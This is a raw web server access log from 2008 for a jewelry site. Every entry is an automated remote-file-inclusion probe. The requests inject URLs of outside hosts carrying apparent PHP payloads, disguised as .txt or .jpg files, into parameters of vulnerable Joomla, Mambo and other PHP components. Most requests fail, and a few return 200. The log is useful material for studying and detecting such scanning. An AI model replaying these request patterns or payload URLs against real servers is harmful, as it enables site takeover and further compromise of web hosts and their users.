78.129.138.184 - - [30/Oct/2008:19:27:29 -0700] "GET /logs//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:27:35 -0700] "GET /logs/access.log%20%20//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:27:35 -0700] "GET /logs//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:28:15 -0700] "GET /logs/access_080531.log%20%20//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:28:22 -0700] "GET /logs/access_080531.log%20%20//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:28:27 -0700] "GET /logs//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:28:27 -0700] "GET /logs/access.log%20%20//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:28:34 -0700] "GET /logs//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:28:34 -0700] "GET /logs/access.log%20%20//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:29:13 -0700] "GET /logs/access_080531.log%20%20//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:29:20 -0700] "GET /logs/access_080531.log%20%20//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
64.128.80.16 - - [30/Oct/2008:19:30:38 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:31:51 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:35:35 -0700] "GET /logs/access.log//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:36:26 -0700] "GET /logs/access.log//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:36:50 -0700] "GET /logs/access_080531.log//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:37:38 -0700] "GET /logs/access.log//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:37:47 -0700] "GET /logs/access_080531.log//modules/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:38:04 -0700] "GET /logs/access_080531.log//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:41:02 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:41:03 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:41:03 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:41:04 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:41:04 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:41:09 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:42:02 -0700] "GET /logs/access.log/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:42:03 -0700] "GET /?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:42:03 -0700] "GET /logs/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.803" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:43:23 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:43:24 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:43:24 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:43:27 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:43:35 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:43:39 -0700] "GET /logs/access.log/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:43:40 -0700] "GET /?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:43:40 -0700] "GET /logs/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.65" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:43:52 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:43:53 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:43:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:43:59 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:44:00 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:44:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:44:08 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:44:09 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:44:10 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:44:21 -0700] "GET /logs/access.log//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:44:33 -0700] "GET /logs/access.log/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:44:34 -0700] "GET /?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:44:36 -0700] "GET /logs/?sourcedir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:44:37 -0700] "GET /logs/access_080531.log//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:46:12 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:46:26 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:47:27 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:47:27 -0700] "GET /logs/access_080531.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:51:17 -0700] "GET /logs/access_080531.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:51:17 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:51:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:51:20 -0700] "GET /logs/access_080531.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:51:20 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:51:21 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:19:52:37 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:19:52:37 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:19:52:37 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:19:52:38 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:19:52:38 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
203.146.15.54 - - [30/Oct/2008:19:52:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:52:41 -0700] "GET /logs/access_080531.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:52:42 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:52:43 -0700] "GET /logs/access_080531.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:52:43 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:52:44 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:52:45 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:19:55:07 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:19:55:07 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:19:55:07 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:55:27 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:55:28 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:55:28 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:55:29 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:55:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:55:30 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:19:58:59 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:00:19 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:00:19 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:00:20 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:00:20 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:00:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:20:00:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
24.41.95.132 - - [30/Oct/2008:20:00:47 -0700] "GET /?sourcedir=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/off.txt??? HTTP/1.1" 200 779 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sojewels.com"
24.41.95.132 - - [30/Oct/2008:20:00:47 -0700] "GET /logs/?sourcedir=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/off.txt??? HTTP/1.1" 200 1796 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sojewels.com"
24.41.95.132 - - [30/Oct/2008:20:00:47 -0700] "GET /errors.php?error=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/off.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sojewels.com"
24.41.95.132 - - [30/Oct/2008:20:00:47 -0700] "GET /logs/errors.php?error=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/off.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sojewels.com"
24.41.95.132 - - [30/Oct/2008:20:01:03 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/off.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sojewels.com"
24.41.95.132 - - [30/Oct/2008:20:01:04 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/off.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:01:46 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:01:46 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:20:01:47 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:20:02:17 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:20:02:18 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:20:02:18 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:02:19 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:02:19 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:02:19 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:02:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:20:02:20 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
